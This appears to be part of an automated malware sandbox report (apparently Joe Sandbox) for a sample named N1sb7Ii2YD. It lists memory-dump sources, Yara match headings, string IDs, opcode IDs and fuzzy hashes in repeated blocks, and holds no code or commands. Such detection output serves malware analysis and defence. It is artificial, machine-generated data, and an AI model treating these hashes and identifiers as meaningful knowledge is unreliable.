                                                                                                                                                                                                                                                    • API String ID: 0-3772416878
                                                                                                                                                                                                                                                    • Opcode ID: 735cee050c0adee449850ba2ce1bb04225bd749ef176fa0d293106b9e62c3734
                                                                                                                                                                                                                                                    • Instruction ID: 51661ef0850f4c3ce01edf16f6728a237ffb0b86e78b4008153acd9fc87241be
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 735cee050c0adee449850ba2ce1bb04225bd749ef176fa0d293106b9e62c3734
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D6B138712083819FD321DF28C98461BFBE0AFA9704F444E2DE5D99B342D635E918CBA6
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: js{g
                                                                                                                                                                                                                                                    • API String ID: 0-1014319796
                                                                                                                                                                                                                                                    • Opcode ID: 9c18fcfdf183d3e6e2325b026543344db9fcf0b9b7ccceb31fbfaeb5f3b5c64c
                                                                                                                                                                                                                                                    • Instruction ID: 14be18684298a51b6f1365b8eea6b5aba3066a4a8cfe6059be97ad669d3f7baa
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c18fcfdf183d3e6e2325b026543344db9fcf0b9b7ccceb31fbfaeb5f3b5c64c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FF815671650B804BE7398F35C8517ABBBE2AB56718F08895DD4D39BB85C378E406CB44
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: js{g
                                                                                                                                                                                                                                                    • API String ID: 0-1014319796
                                                                                                                                                                                                                                                    • Opcode ID: 2bedd816319602fe80fa94cf924704a6c11e2863fdffa8fa3602250936590e55
                                                                                                                                                                                                                                                    • Instruction ID: bf4b507b84c2388907f6df6ad68628265c00c2f0168697d8c6109a0bb556fb04
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2bedd816319602fe80fa94cf924704a6c11e2863fdffa8fa3602250936590e55
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 40814671245B804BE7398F39D9517ABBBE2AB92718F08895CD5C39BF95C378E406CB00
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                                                                                    • String ID: gfff
                                                                                                                                                                                                                                                    • API String ID: 2994545307-1553575800
                                                                                                                                                                                                                                                    • Opcode ID: edeab19d381afadd31cc405ebd905f0fbf719b22c328d17ebe50dae378019542
                                                                                                                                                                                                                                                    • Instruction ID: c6a45f7a1688543314b9a3a30fef6f223fff4d1289bb41df6adbe344278a34bf
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: edeab19d381afadd31cc405ebd905f0fbf719b22c328d17ebe50dae378019542
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0F81D2717147418FD325CB39CC50BA6BBE2AB95308F18C57ED096CB7A6EA78A842C744
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                                                                                    • String ID: ihgf
                                                                                                                                                                                                                                                    • API String ID: 2994545307-2948842496
                                                                                                                                                                                                                                                    • Opcode ID: 1de35141843d01284fbd49b4b94197a3011845f6d285c59de9b2ec666c4b6e9d
                                                                                                                                                                                                                                                    • Instruction ID: 39294a001ccb7b60b57bd072fead094b817a0247c43ae1e4845dbb8435dacfda
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1de35141843d01284fbd49b4b94197a3011845f6d285c59de9b2ec666c4b6e9d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5B81C274A04201AFD714CF28E881A6BB7F2FF99314F15A52DE5858B3A1DB35EC11CB46
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: ihgf
                                                                                                                                                                                                                                                    • API String ID: 0-2948842496
                                                                                                                                                                                                                                                    • Opcode ID: eef0a356b23e55d2308e20bed1a6a7dcd73da6f3f0547914f9e2b30739e3ef6c
                                                                                                                                                                                                                                                    • Instruction ID: 4dcb0f101ee3429e1173dad17b17fc0cef70af51a8f735b7a93707a953605fe3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eef0a356b23e55d2308e20bed1a6a7dcd73da6f3f0547914f9e2b30739e3ef6c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A81C3746052019FD724DF28CA81AABB7F6EFD9324F15852CE5848B3A5EB31EC41CB42
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: gfff
                                                                                                                                                                                                                                                    • API String ID: 0-1553575800
                                                                                                                                                                                                                                                    • Opcode ID: de86720abe9662384bfc4389f4b275199587a53d7c35c6b33b3c21993df62823
                                                                                                                                                                                                                                                    • Instruction ID: 527e8babff78a98fcf259b7f4c4084e0b466ee945f23218b783e3b100013a023
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: de86720abe9662384bfc4389f4b275199587a53d7c35c6b33b3c21993df62823
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B471F0B1714B428BD728CF7DC8507A6BBD2AB95304F18C57DC096CB7A2EA78E842C740
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: "
                                                                                                                                                                                                                                                    • API String ID: 0-123907689
                                                                                                                                                                                                                                                    • Opcode ID: b7a1194b168b1501942729701b4a53f4548888071d1548b4e937d3e0a1efc159
                                                                                                                                                                                                                                                    • Instruction ID: 4b2f630bb6a68757ad0504ce5be77257e5761d12b45ca5ba0373d51c8e5240e3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b7a1194b168b1501942729701b4a53f4548888071d1548b4e937d3e0a1efc159
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 22710532B083259BD714CE28E88431BB7E2ABC5710F99852EEC948B391D379DC55878B
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: "
                                                                                                                                                                                                                                                    • API String ID: 0-123907689
                                                                                                                                                                                                                                                    • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                    • Instruction ID: 0ce745fcaaefc9ebf4c9870140787c3f281db346b8485ebd7a7e145ff54c1dd6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F71B632A083558BD714CE2CC48031EBBE6ABC6754F19896DE49497391D339DD45CBC7
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: DB
                                                                                                                                                                                                                                                    • API String ID: 0-3908451873
                                                                                                                                                                                                                                                    • Opcode ID: 0ddf0731ddfeaa883e7311870e36d02f96856f6d12ce1652dd7f7008e8803fec
                                                                                                                                                                                                                                                    • Instruction ID: 63fe74dcdf674bdd3faef37b2e0283437cd793175f1af46cf0498e51130e9ee1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ddf0731ddfeaa883e7311870e36d02f96856f6d12ce1652dd7f7008e8803fec
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A381B67AF04225CBCB18CF64D8905AEB7B2FFDA710F59806AC841AB355DB349D42CB54
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: LB
                                                                                                                                                                                                                                                    • API String ID: 0-539997225
                                                                                                                                                                                                                                                    • Opcode ID: d02495da20a3f8a7219353459d550f72d20704d827e4251e17801bf690faaf74
                                                                                                                                                                                                                                                    • Instruction ID: 190c79d128488961cfb389f9b0ffad8fedd0031ada35975bf34f4c17adb32e46
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d02495da20a3f8a7219353459d550f72d20704d827e4251e17801bf690faaf74
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D1618E31B412228BDB18CF29E8A12FBFBE2EF91310B58466ED4574B3C1D7389941D799
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: Y*>
                                                                                                                                                                                                                                                    • API String ID: 0-3862480330
                                                                                                                                                                                                                                                    • Opcode ID: 22b3804befe7f91e84aca949ffb80fce2ed22dd13d93b44656185de14de2ea60
                                                                                                                                                                                                                                                    • Instruction ID: 90e50e1672eaf7fe8d97f2f09bdb4033b3ef25f85dbdb073c688402916a0328e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 22b3804befe7f91e84aca949ffb80fce2ed22dd13d93b44656185de14de2ea60
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4C510573F499814BD72C893C5C223EAAA834BD6234B2DD77BE4B2CB3E4D5698C464345
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: Y*>
                                                                                                                                                                                                                                                    • API String ID: 0-3862480330
                                                                                                                                                                                                                                                    • Opcode ID: 22b3804befe7f91e84aca949ffb80fce2ed22dd13d93b44656185de14de2ea60
                                                                                                                                                                                                                                                    • Instruction ID: 8aba34c2517e225fcc7a6e9387abcaddaaf6c11269b9bd40bfe8ff2efd3127b1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 22b3804befe7f91e84aca949ffb80fce2ed22dd13d93b44656185de14de2ea60
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7351F533B5D9814BEB3CC93C5C222AAAA834BD6234B2DCB7AD4B5CB3E5D5B94C454340
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: m
                                                                                                                                                                                                                                                    • API String ID: 0-3775001192
                                                                                                                                                                                                                                                    • Opcode ID: 41b4e45d489525032a7ff55d2696e510600e92b2c3d7551ddfae36ad8bd27945
                                                                                                                                                                                                                                                    • Instruction ID: 3e2b75cee485a9b0042cbe397ad6f27f8800a40967ab16f20d2907153a94f7d1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 41b4e45d489525032a7ff55d2696e510600e92b2c3d7551ddfae36ad8bd27945
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A0515BF19083508FD724DF28849566FBBE5AFD2304F08892DF5D547352DA39D909CB92
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: w
                                                                                                                                                                                                                                                    • API String ID: 0-2991200456
                                                                                                                                                                                                                                                    • Opcode ID: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
                                                                                                                                                                                                                                                    • Instruction ID: 72f7098589d43736da4273b9d7e3299e197f10f25cbeea51759b9c2434ba13e7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8E4119B6E116558FD704DFA4CC855ABBB72FB88315B1AC1A8C8847B319D77868078BD0
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: w
                                                                                                                                                                                                                                                    • API String ID: 0-2991200456
                                                                                                                                                                                                                                                    • Opcode ID: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
                                                                                                                                                                                                                                                    • Instruction ID: a2c295e6f4eb33ac18df21ba4b2103b204995f1770c88b504fb006d30e0c7ab2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2B4128B6E116258FD704DFA4CD855ABBB72FB84315B0AC1A8C8847B31AD77869078BD0
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: ihgf
                                                                                                                                                                                                                                                    • API String ID: 0-2948842496
                                                                                                                                                                                                                                                    • Opcode ID: 2b213d4144a63b266ffc054ecdea8f1b716e225e094351901ee27163bfaa7a7b
                                                                                                                                                                                                                                                    • Instruction ID: baac7d6db0ee046f3166e2d632b6e15a30fc467c6d31e402686af220ad12b7da
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2b213d4144a63b266ffc054ecdea8f1b716e225e094351901ee27163bfaa7a7b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A3108343063016BE710AF249D81BBFBBA8DB96724F28452CE58493290E661EC51C656
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                                                                                    • String ID: ihgf
                                                                                                                                                                                                                                                    • API String ID: 2994545307-2948842496
                                                                                                                                                                                                                                                    • Opcode ID: eabeb2773ff9bbc58c6c2f5a50c7ebc9f6505f28b325af4d1c0bf5b4a04395ef
                                                                                                                                                                                                                                                    • Instruction ID: 0aea9c019cfcbf9c29137c9c12aa4ed540cc4986b7a763f7409eb823f2adcf13
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eabeb2773ff9bbc58c6c2f5a50c7ebc9f6505f28b325af4d1c0bf5b4a04395ef
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9831D474308300AFE7109B249CC1B3BF7A6EB8A718F24692EE584A72D1D665EC10875A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: ihgf
                                                                                                                                                                                                                                                    • API String ID: 0-2948842496
                                                                                                                                                                                                                                                    • Opcode ID: ae411421d2ccc92dd1a2e9f178d6aa2591b1cae486c28fda228ff2e2e7e3843c
                                                                                                                                                                                                                                                    • Instruction ID: 1d709b7d38b1f694b71435f569db2a08ae66721402815d9ffec7917a82b6522a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ae411421d2ccc92dd1a2e9f178d6aa2591b1cae486c28fda228ff2e2e7e3843c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C31093430A301ABE7148B189E81BBBBBE8EB86724F24453CE68457291F731EC50CA56
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: dB
                                                                                                                                                                                                                                                    • API String ID: 0-2104629891
                                                                                                                                                                                                                                                    • Opcode ID: e3ed35eba93c559e2b640e4773887084713877586e1a61965fa59bb2e9adbcdb
                                                                                                                                                                                                                                                    • Instruction ID: 88d28f4539103711ef6104adbc4c901a24cbbd6804f5379e7088d630b29811a1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e3ed35eba93c559e2b640e4773887084713877586e1a61965fa59bb2e9adbcdb
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5DA00129A9E6548AD2119F4494927F0F778E31770AF1438289904AB153D196E950864C
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 3084e788d8e9e13a5090e4988abe973650b471a43da6e1d7f92269c8d9692421
                                                                                                                                                                                                                                                    • Instruction ID: d6216dced0a3b9436857ee0068e0dff51503e5ecb223af83f8720e1cf69b390d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3084e788d8e9e13a5090e4988abe973650b471a43da6e1d7f92269c8d9692421
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F02242B56082009FE7149F24EC41B6B73A2FBDB300F55893EF6C487292DA799C41CB4A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 5a7678f017f308848797c1ab2fc33ccddf339249d7514e43f7e0819896a5eda0
                                                                                                                                                                                                                                                    • Instruction ID: 9c79f7e63c480dd40f7a7ccc60d41b21814d9940eb0dc65dd07d8a453e372cf2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5a7678f017f308848797c1ab2fc33ccddf339249d7514e43f7e0819896a5eda0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 16120E35204B018FD325CF29C8907A3BBE2EF9A314F19866DD4DA8B795D738E846CB54
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 72a6a3e3d9910456b2428f635a2497b38a29212f29c235746c3062a84d19069c
                                                                                                                                                                                                                                                    • Instruction ID: b7901f3288d9e4572b9bc57ce4c79cacd886df45a950704f10474c7163005246
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 72a6a3e3d9910456b2428f635a2497b38a29212f29c235746c3062a84d19069c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CE52F4715083458FCB14CF18C0806AABFE1BF89315F18867EF8996B391D778EA49CB85
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 2cf22539860d374f1b5b70c1f2b7734314ec6e2843ab381a6f5f63b3db803864
